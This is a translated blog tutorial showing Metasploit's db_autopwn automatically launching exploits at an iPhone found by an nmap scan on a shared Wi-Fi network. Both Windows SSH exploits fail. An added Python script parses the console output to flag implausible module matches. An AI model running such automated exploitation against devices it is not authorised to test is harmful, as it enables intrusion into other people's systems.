Tutorial Metasploit

Metasploit is an exploitation framework bundled with BackTrack; the following tutorial shows exploitation with Metasploit on a BackTrack system. The scenario: a BackTrack 5 machine connected to an access point, and a target iPhone (firmware 4.0.2) with SSH enabled over Wi-Fi, actively connected to the same access point.

root@leak#msfconsole

   =[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ -- --=[ 697 exploits - 358 auxiliary - 54 post
+ -- --=[ 224 payloads - 27 encoders - 8 nops
       =[ svn r12973 updated today (2011.06.18)

msf > db_driver postgresql
[*] Using database driver postgresql
msf > db_connect -y /opt/framework3/config/database.yml
[*] Using database driver postgresql
 (note: db_connect must be pointed manually at the folder containing the database config)

[*] Nmap: Starting Nmap 5.51SVN ( http://nmap.org ) at 2011-06-19 21:14 CIT
[*] Nmap: Nmap scan report for 192.168.10.100
[*] Nmap: Host is up (0.0075s latency).
[*] Nmap: Not shown: 998 closed ports
[*] Nmap: PORT      STATE SERVICE
[*] Nmap: 22/tcp    open  ssh
[*] Nmap: 62078/tcp open  iphone-sync
[*] Nmap: MAC Address: E8:06:88:7C:8D:89 (Apple )
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 12.22 seconds
(scanning with nmap; nmap has many scan options; ports 22 and 62078 are shown open)
[*] Usage: db_autopwn [options]
        -h          Display this help text
        -t          Show all matching exploit modules
        -x          Select modules based on vulnerability references
        -p          Select modules based on open ports
        -e          Launch exploits against all matched targets
        -r          Use a reverse connect shell
        -b          Use a bind shell on a random port (default)
        -q          Disable exploit module output
        -R  [rank]  Only run modules with a minimal rank
        -I  [range] Only exploit hosts inside this range
        -X  [range] Always exclude hosts inside this range
        -PI [range] Only exploit hosts with these ports open
        -PX [range] Always exclude hosts with these ports open
        -m  [regex] Only run modules whose name matches the regex
        -T  [secs]  Maximum runtime for any exploit in seconds

msf > db_autopwn -t -e -p
[*] Analysis completed in 20 seconds (0 vulns / 0 refs)
[*]
[*] ================================================================================
[*]                             Matching Exploit Modules
[*] ================================================================================
[*]   192.168.10.100:22  exploit/windows/ssh/freeftpd_key_exchange  (port match)
[*]   192.168.10.100:22  exploit/windows/ssh/freesshd_key_exchange  (port match)
[*] ================================================================================
[*]
[*]
[*] (1/2 [0 sessions]): Launching exploit/windows/ssh/freeftpd_key_exchange against 192.168.10.100:22...
[*] (2/2 [0 sessions]): Launching exploit/windows/ssh/freesshd_key_exchange against 192.168.10.100:22...
[*] (2/2 [0 sessions]): Waiting on 2 launched modules to finish execution...
[*] (2/2 [0 sessions]): Waiting on 0 launched modules to finish execution...
[*] The autopwn command has completed with 0 sessions

(db_autopwn in msf3 is a script that automatically selects exploits matching the target's open ports. From the output above, the target is not vulnerable to these exploits, since no session was obtained; both modules were selected by port match only and are Windows SSH server exploits, so a match on port 22 alone says nothing about an Apple device.)
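As an added example, not part of the original post, the following Python script parses the console lines above (the db_nmap output and the db_autopwn -t match table) and flags port-matched modules whose platform directory cannot plausibly apply to the scanned host. The vendor-to-platform map and the function names are assumptions made for this illustration, not anything Metasploit ships.

```python
import re

# Constructed sample: the relevant msfconsole lines from the tutorial above,
# copied verbatim (db_nmap output and the db_autopwn -t match table).
SAMPLE = """\
[*] Nmap: Nmap scan report for 192.168.10.100
[*] Nmap: 22/tcp    open  ssh
[*] Nmap: 62078/tcp open  iphone-sync
[*] Nmap: MAC Address: E8:06:88:7C:8D:89 (Apple )
[*]   192.168.10.100:22  exploit/windows/ssh/freeftpd_key_exchange  (port match)
[*]   192.168.10.100:22  exploit/windows/ssh/freesshd_key_exchange  (port match)
"""

PORT_RE = re.compile(r"\[\*\] Nmap: (\d+)/tcp\s+open\s+(\S+)")
MAC_RE = re.compile(r"\[\*\] Nmap: MAC Address: \S+ \((.*?)\s*\)")
MATCH_RE = re.compile(r"\[\*\]\s+(\S+):(\d+)\s+(exploit/([^/]+)/\S+)\s+\((\w+) match\)")

# Assumed mapping from the NIC vendor nmap reports (via MAC OUI) to the Metasploit
# module platform directories that could plausibly apply to that hardware.
# Hypothetical lookup for this example only, not a table Metasploit provides.
VENDOR_PLATFORMS = {"Apple": {"osx", "apple_ios", "multi", "unix"}}

def parse_console(text):
    """Extract open ports, the NIC vendor and db_autopwn matches from console output."""
    ports, vendor, matches = {}, None, []
    for line in text.splitlines():
        if m := PORT_RE.match(line):
            ports[int(m.group(1))] = m.group(2)
        elif m := MAC_RE.match(line):
            vendor = m.group(1)
        elif m := MATCH_RE.match(line):
            host, port, module, platform, how = m.groups()
            matches.append((host, int(port), module, platform, how))
    return ports, vendor, matches

def assess_matches(text):
    """Flag port-matched modules whose platform cannot apply to the scanned host."""
    ports, vendor, matches = parse_console(text)
    plausible = VENDOR_PLATFORMS.get(vendor, set())
    report = []
    for host, port, module, platform, how in matches:
        report.append({
            "module": module,
            "service": ports.get(port, "?"),
            "matched_by": how,
            "platform_plausible": how != "port" or platform in plausible,
        })
    return report

if __name__ == "__main__":
    for row in assess_matches(SAMPLE):
        print(row)
```

Both tutorial matches come out with platform_plausible False, which is the same conclusion the console reached the slow way by launching them and getting 0 sessions.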

source: http://mangnik.blogspot.com/2011/08/tutorial-metasploit.html (translated)